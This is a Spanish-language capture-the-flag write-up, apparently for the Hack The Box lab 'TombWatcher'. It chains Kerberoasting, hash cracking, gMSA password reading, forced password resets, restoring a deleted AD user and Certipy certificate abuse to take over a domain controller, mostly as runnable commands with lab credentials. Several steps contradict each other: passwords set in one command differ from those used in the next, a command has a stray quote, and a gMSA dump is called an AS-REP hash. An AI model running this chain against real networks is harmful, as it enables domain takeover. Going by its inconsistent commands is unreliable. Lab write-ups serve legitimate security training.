TombWatcher

Machine Information As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

Escaneo:

   1   │ # Nmap 7.95 scan initiated Sat Jun  7 19:03:46 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49683,49684,49685,49704,49710,49725,4973
       │ 2 -oN targeted 10.10.11.72
   2   │ Nmap scan report for 10.10.11.72
   3   │ Host is up (0.24s latency).
   4   │ 
   5   │ PORT      STATE SERVICE       VERSION
   6   │ 53/tcp    open  domain        Simple DNS Plus
   7   │ 80/tcp    open  http          Microsoft IIS httpd 10.0
   8   │ | http-methods: 
   9   │ |_  Potentially risky methods: TRACE
  10   │ |_http-server-header: Microsoft-IIS/10.0
  11   │ |_http-title: IIS Windows Server
  12   │ 88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-07 23:03:49Z)
  13   │ 135/tcp   open  msrpc         Microsoft Windows RPC
  14   │ 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
  15   │ 389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
  16   │ |_ssl-date: 2025-06-07T23:05:25+00:00; +3h59m55s from scanner time.
  17   │ | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
  18   │ | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
  19   │ | Not valid before: 2024-11-16T00:47:59
  20   │ |_Not valid after:  2025-11-16T00:47:59
  21   │ 445/tcp   open  microsoft-ds?
  22   │ 464/tcp   open  kpasswd5?
  23   │ 593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  24   │ 636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
  25   │ |_ssl-date: 2025-06-07T23:05:25+00:00; +3h59m56s from scanner time.
  26   │ | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
  27   │ | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
  28   │ | Not valid before: 2024-11-16T00:47:59
  29   │ |_Not valid after:  2025-11-16T00:47:59
  30   │ 3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
  31   │ | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
  32   │ | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
  33   │ | Not valid before: 2024-11-16T00:47:59
  34   │ |_Not valid after:  2025-11-16T00:47:59
  35   │ |_ssl-date: 2025-06-07T23:05:24+00:00; +3h59m56s from scanner time.
  36   │ 3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
  37   │ | ssl-cert: Subject: commonName=DC01.tombwatcher.htb
  38   │ | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
  39   │ | Not valid before: 2024-11-16T00:47:59
  40   │ |_Not valid after:  2025-11-16T00:47:59
  41   │ |_ssl-date: 2025-06-07T23:05:25+00:00; +3h59m56s from scanner time.
  42   │ 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  43   │ |_http-title: Not Found
  44   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  45   │ 9389/tcp  open  mc-nmf        .NET Message Framing
  46   │ 49666/tcp open  msrpc         Microsoft Windows RPC
  47   │ 49683/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  48   │ 49684/tcp open  msrpc         Microsoft Windows RPC
  49   │ 49685/tcp open  msrpc         Microsoft Windows RPC
  50   │ 49704/tcp open  msrpc         Microsoft Windows RPC
  51   │ 49710/tcp open  msrpc         Microsoft Windows RPC
  52   │ 49725/tcp open  msrpc         Microsoft Windows RPC
  53   │ 49732/tcp open  msrpc         Microsoft Windows RPC
  54   │ Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
  55   │ 
  56   │ Host script results:
  57   │ |_clock-skew: mean: 3h59m55s, deviation: 0s, median: 3h59m55s
  58   │ | smb2-time: 
  59   │ |   date: 2025-06-07T23:04:43
  60   │ |_  start_date: N/A
  61   │ | smb2-security-mode: 
  62   │ |   3:1:1: 
  63   │ |_    Message signing enabled and required
  64   │ 
  65   │ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  66   │ # Nmap done at Sat Jun  7 19:05:30 2025 -- 1 IP address (1 host up) scanned in 104.46 seconds

Le tiramos el BloodHound:

python3 bloodhound.py -c ALL -u henry -p 'H3nry_987TGV!' -d tombwatcher.htb -ns 10.10.11.72 --zip

WriteSPN

Ataque Kerberoasting

Se utiliza la herramienta targetedKerberoast.py para obtener el hash de Kerberos de un usuario objetivo (Alfred), lo que podría permitir la obtención de la contraseña de este usuario a través de un ataque de Kerberoasting.

python3 targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'

Descifrado del Hash de Kerberos

Utilizando John the Ripper, se descifra el hash de Alfred para obtener su contraseña en texto claro.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

bas-----      (?)

AddSelf

Verificación de Membresías de Grupo para Alfred

Se verifica si Alfred pertenece al grupo INFRASTRUCTURE, lo que permite verificar sus privilegios en el dominio.

net rpc group members "INFRASTRUCTURE" -U tombwatcher.htb/Alfred%'basketball' -S 10.10.11.72

ReadGMSAPassword

Obtención de Hash de AS-REP con gMSADumper

Con la herramienta gMSADumper, se obtiene el hash de ansible_dev$, lo que puede permitir realizar un ataque de Pass-the-Hash.

python3 gMSADumper.py -u 'Alfred' -p 'basketball' -d 'tombwatcher.htb'

ForceChangePasswd

Cambio de Contraseña para SAM

Utilizando bloodyAD, se cambia la contraseña del usuario sam con el hash obtenido del paso anterior.

python3 bloodyAD.py -u 'ansible_dev$' -p ':1c37d00093dc2a5f251-----' -d tombwatcher.htb --dc-ip 10.10.11.72 set password sam 'Password123!'

[+] Password changed successfully!

WriteOwner

Cambio de Contraseña para JOHN

Se cambia la contraseña de JOHN con bloodyAD, ahora utilizando la nueva contraseña de SAM.

python3 bloodyAD.py --host 10.10.11.72 -d tombwatcher.htb -u 'SAM' -p 'Password123!' set password JOHN PasswordJohn2022

[+] Password changed successfully!

— Conexión con Evil-WinRM —

evil-winrm -i 10.10.11.72 -u john -p 'PasswordJohn2022'

ESCALADA DE PRIVILEGIOS

Restore-ADObject y Certpy

Enumerar Usuarios Eliminados en Active Directory

Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List

Restaurar el Objeto de Usuario Eliminado

Para restaurar el objeto de usuario cert_admin, que fue eliminado en el paso anterior, utilizamos el siguiente comando de PowerShell:

Restore-ADObject -Identity '938182c3-bf0b-410a-9aaa-45c8e1a02ebf'

Cambio de Contraseña del Usuario Restaurado (cert_admin)

python3 bloodyAD.py --host dc01.tombwatcher.htb -d tombwatcher.htb -u JOHN -p 'PasswordJohn2022' set password cert_admin 'PasswordJohn2022''

Solicitar Certificado con Certipy

Una vez que la contraseña de cert_admin ha sido cambiada, podemos solicitar un certificado usando Certipy. El objetivo es obtener un certificado de autenticación para Administrator con el template WebServer.

 certipy req -u 'cert_admin@tombwatcher.htb' -p 'P@ssw0rd123!' -target dc01.tombwatcher.htb -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'Administrator' -application-policies 'Client Authentication'

Autenticación con el Certificado

Una vez obtenido el certificado, utilizamos el siguiente comando para autenticar con el DC de tombwatcher.htb utilizando el certificado.

certipy auth -pfx administrator.pfx -dc-ip 10.10.XX.XX -domain tombwatcher.htb -ldap-shell

Cambiar la Contraseña de Administrator

Una vez autenticado como Administrator, podemos cambiar la contraseña del usuario Administrator.

# change_password administrator Password@123
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: Password@123
Password changed successfully!

Acceso con Evil-WinRM

evil-winrm -i dc01.tombwatcher.htb -u Administrator -p 'P@ssw0rd123!'

PreviousCertificate NextHospital

Last updated 8 months ago

hashtagWriteSPN

hashtagAddSelf

hashtagReadGMSAPassword

hashtagForceChangePasswd

hashtagWriteOwner

hashtagRestore-ADObject y Certpy